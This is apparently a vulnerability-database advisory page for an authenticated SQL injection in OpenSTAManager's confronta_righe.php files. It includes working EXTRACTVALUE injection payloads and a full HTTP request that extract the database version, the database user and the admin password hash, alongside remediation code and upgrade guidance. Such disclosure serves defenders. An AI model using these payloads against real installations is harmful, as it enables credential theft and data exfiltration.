PHP
CVE-2026-35470
HIGH
Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Description
Six confronta_righe.php files across different modules in OpenSTAManager <= 2.10.1 contain an SQL Injection vulnerability. The righe parameter received via $_GET['righe'] is directly concatenated into an SQL query without any sanitization, parameterization or validation.
An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data.
Affected Files
All 6 vulnerable files share the same code pattern:
| File | Line | Affected Table |
|
Vulnerable Code
|---|------|------|----------------| | 1 | modules/fatture/modals/confronta_righe.php | 29 | co_righe_documenti | | 2 | modules/interventi/modals/confronta_righe.php | 29 | in_righe_interventi | | 3 | modules/preventivi/modals/confronta_righe.php | 28 | co_righe_preventivi | | 4 | modules/ordini/modals/confronta_righe.php | 29 | or_righe_ordini | | 5 | modules/ddt/modals/confronta_righe.php | 29 | dt_righe_ddt | | 6 | modules/contratti/modals/confronta_righe.php | 28 | co_righe_contratti |
All files follow the same pattern. Example from modules/interventi/modals/confronta_righe.php:
$righe = $_GET['righe']; // Line 29 - No sanitization
$righe = $dbo->fetchArray(
'SELECT
`mg_articoli_lang`.`title`,
`mg_articoli`.`codice`,
`in_righe_interventi`.*
FROM
`in_righe_interventi`
INNER JOIN `mg_articoli` ON `mg_articoli`.`id` = `in_righe_interventi`.`idarticolo`
LEFT JOIN `mg_articoli_lang` ON (...)
WHERE
`in_righe_interventi`.`id` IN ('.$righe.')' // Line 41 - Direct concatenation
);The value of $_GET['righe'] is inserted directly into the SQL IN() clause without using prepare(), parameterized statements or any sanitization function.
Reproduction
Prerequisites
- Authenticated session (any user with module access)
- At least one existing record in the target module (e.g. an intervention with id=1)
Step 1: Extract MySQL version
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT VERSION())))%23Result: XPATH syntax error: '~8.3.0'
Step 2: Extract database user
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT USER())))%23Result: XPATH syntax error: '~root@172.19.0.3'
Step 3: Extract admin credentials
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,0x3a,password) FROM zz_users LIMIT 1)))%23Result: XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'
Evidence
<img width="1254" height="395" alt="image" src="https://github.com/user-attachments/assets/a2367ed6-fa03-4668-9d74-4298cac5e429" />
HTTP Request
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(username,0x3a,password)%20FROM%20zz_users%20LIMIT%201)))%23 HTTP/1.1
Host: <TARGET>
Cookie: PHPSESSID=<SESSION_ID>Response (excerpt)
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'Impact
- Confidentiality (High): Full database data extraction including user credentials (bcrypt hashes), customer data, invoices, contracts and any stored information
- Integrity (High): Data modification via injected INSERT/UPDATE/DELETE statements through stacked queries or subqueries
- Availability (High): Deletion of tables or critical data, database corruption
Remediation
Recommended Fix
Use parameterized statements with prepare() for the righe parameter:
// BEFORE (vulnerable):
$righe = $_GET['righe'];
$righe = $dbo->fetchArray(
'... WHERE `in_righe_interventi`.`id` IN ('.$righe.')'
);
// AFTER (secure):
$righe_ids = array_map('intval', explode(',', $_GET['righe'] ?? ''));
$placeholders = implode(',', array_fill(0, count($righe_ids), '?'));
$righe = $dbo->fetchArray(
'... WHERE `in_righe_interventi`.`id` IN ('.$placeholders.')',
$righe_ids
);This fix must be applied to all 6 files listed in the "Affected Files" section.
Credits
Omar Ramirez
AnalysisAI
SQL injection in OpenSTAManager 2.10.1 and prior allows authenticated users to extract database contents including bcrypt password hashes, customer records, and financial data via unsanitized GET parameters across six vulnerable PHP modules. The righe parameter in confronta_righe.php files is directly concatenated into IN() clauses without parameterization. CVSS 8.8 (High) with network attack vector, low complexity, and low privilege requirement. Vendor-released patch available in version 2.10.2. Exploit reproduction demonstrated via EXTRACTVALUE-based error injection extracting MySQL version, database user, and admin credentials. Confirmed publicly available exploit code exists (GitHub advisory GHSA-mmm5-3g4x-qw39).
Technical ContextAI
OpenSTAManager is an open-source PHP-based management platform for invoicing, contracts, and service tracking. The vulnerability stems from classic CWE-89 SQL injection where user-controlled input from $_GET['righe'] is concatenated directly into dynamically constructed SQL queries. The affected code pattern repeats across six modules (fatture, interventi, preventivi, ordini, ddt, contratti), each querying different tables (co_righe_documenti, in_righe_interventi, co_righe_preventivi, or_righe_ordini, dt_righe_ddt, co_righe_contratti). The application uses PHP's dbo->fetchArray() without prepared statements, allowing injection into the IN() clause of SELECT queries. Error-based SQL injection via MySQL's EXTRACTVALUE() function enables immediate data exfiltration through XPATH syntax error messages. The CPE identifier pkg:composer/devcode-it_openstamanager indicates distribution via Composer package manager, typical for PHP business applications with database backends handling sensitive commercial data.
RemediationAI
Upgrade immediately to OpenSTAManager version 2.10.2 released by the vendor to address this SQL injection vulnerability. The patched version is available at https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2 and through Composer package updates. Organizations unable to upgrade immediately should implement application-layer input validation as a temporary mitigation: modify all six affected confronta_righe.php files to use parameterized queries by splitting the righe parameter on commas, validating each value as an integer via array_map('intval', explode(',', $_GET['righe'])), constructing placeholders with implode(',', array_fill(0, count($righe_ids), '?')), and passing the sanitized array to prepared statements. Additionally, enforce strict database user permissions limiting SELECT-only access for the application database user to minimize potential data modification impact. Review application logs for suspicious requests to confronta_righe.php endpoints containing SQL keywords (UNION, EXTRACTVALUE, CONCAT) or unusual righe parameter patterns. Post-patching, rotate all database credentials and audit user account activity if exploitation is suspected based on the demonstrated credential extraction technique.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-89 – SQL Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-mmm5-3g4x-qw39